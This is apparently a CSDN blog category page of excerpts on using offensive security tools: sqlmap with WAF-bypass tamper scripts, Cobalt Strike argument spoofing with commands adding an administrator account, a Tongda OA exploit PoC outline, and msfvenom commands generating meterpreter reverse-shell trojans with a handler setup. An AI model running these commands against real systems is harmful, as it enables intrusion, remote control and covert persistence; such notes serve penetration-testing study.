![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全工具使用
文章平均质量分 66
MSF、cs、... ...
天问_Herbert555
努力把人生变成自己所期待的样子!
展开
-
SQLMAP使用总结
正常注入python sqlmap.py -r .\test.txt --level 3 --batch --dbs 绕过wafsqlmap.py -r .\test.txt --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py获取可获得信息sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba原创 2022-05-02 20:23:13 · 1119 阅读 · 0 评论 -
fiddler使用
文章目录设置安装证书Fiddler和Burpsuit联动设置工具→选项→HTTPS1.解密HTTPS通信需要设置,设置后可能需要安装证书2.如果只测试网站的话可以设置为从浏览器3.忽略证书错误也建议勾选上工具→选项→连接1.默认端口是8888 根据自己需求可以修改2.允许远程计算机连接 开启可以抓app的包,不开启抓不了3.其他建议都勾选安装证书访问fiddler IP 加上 设置的端口http://127.0.0.1:8888下载证书并安装Fiddler和Burpsu原创 2021-11-26 14:57:37 · 9766 阅读 · 0 评论 -
实践:内网穿透(使用frp将内网web环境转发到公网阿里云服务器上)
借鉴:https://blog.csdn.net/cao0507/article/details/82758288https://blog.csdn.net/weixin_34244102/article/details/88677915原创 2020-10-05 17:06:12 · 1276 阅读 · 0 评论 -
十 pocsuite3 编写通达OA前台任意用户登录漏洞poc、exp
文章目录0x01 poc编写0x02 exp编写0x03 整合及使用这里练手写了个最近实战复现成功的洞的poc、exp通达OA前台任意用户登录漏洞,具体过程可以看下面文章的通达OA前台任意用户登录部分html sql注入_通达OA前台任意用户登录,文件上传和文件包含,SQL注入复现整个步骤为/general/document/index.php/recv/register/insert路径存在SQL注入SQL注入获取PHPSESSID使用获得的PHPSESSID修改cookie进入后台0原创 2021-04-18 00:20:20 · 3047 阅读 · 1 评论 -
nmap使用总结
端口状态:1.Open,端口开启,有程序监听此端口2.Closed,端口关闭,数据能到达主机,但是没有程序监听此端口。3.Filtered,数据未能到达主机。4.Unfiltered,数据能到达主机,但是Nmap无法判断端口开启还是关闭。5.Open|filtered,端口没有返回值,主要出现在UDP,IP,FIN,NULL和Xmas。6.Closed|filtered,只出现在IP...原创 2020-01-26 12:42:52 · 1760 阅读 · 2 评论 -
【冰蝎】高版本java运行冰蝎(高版本jdk运行jdk8程序通用)
冰蝎beta7版本客户端不再内置JavaFX库,java11以后版本移除了JavaFX库,要运行冰蝎需要自己下载JavaFX库。javaFX:https://openjfx.cn/dl/冰蝎:https://github.com/rebeyond/Behinder下载javaFX,我是java11,就下的这个版本创建一个bat文件,修改–module-path后的路径为自己的javaFX下lib的路径,和冰蝎放在同一目录下start javaw --module-path "D:\softwar原创 2021-08-19 11:32:24 · 5852 阅读 · 4 评论 -
【内网安全】Cobalt Strike 使用
文章目录Beacon命令argue参数污染Beacon命令argue参数污染argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxArgueexecute net1 user test test123 /addexecute net1 localgroup administrators test /addargue 进程参数欺骗argue [command] [fake arguments]argue 命令 假参数 欺骗某个命令参数argue [com原创 2021-07-12 10:57:05 · 2278 阅读 · 0 评论 -
CobaltStrike安装
安装jdk下载jdk1.8——https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html解压tar -zxvf jdk-8u291-linux-x64.tar.gzmv jdk1.8.0_291 /opt添加环境变量echo "export JAVA_HOME=/opt/jdk1.8.0_291/" >> ~/.bashrcecho "export CLASSPATH=.:${JAVA_H原创 2021-07-01 15:39:23 · 3093 阅读 · 0 评论 -
msf生成木马
Windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exemsfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dllmsfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST原创 2021-04-03 18:19:55 · 4186 阅读 · 0 评论 -
MSF使用总结
文章目录生成小马文件运行小马维持会话生成小马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe生成的小马在root目录下运行小马// 进入msfmsfconsole// 监听use exploit/multi/handler// 设置payloadset payload windows/meterpreter/reverse_tcp// 设置s原创 2020-09-25 23:23:05 · 4178 阅读 · 0 评论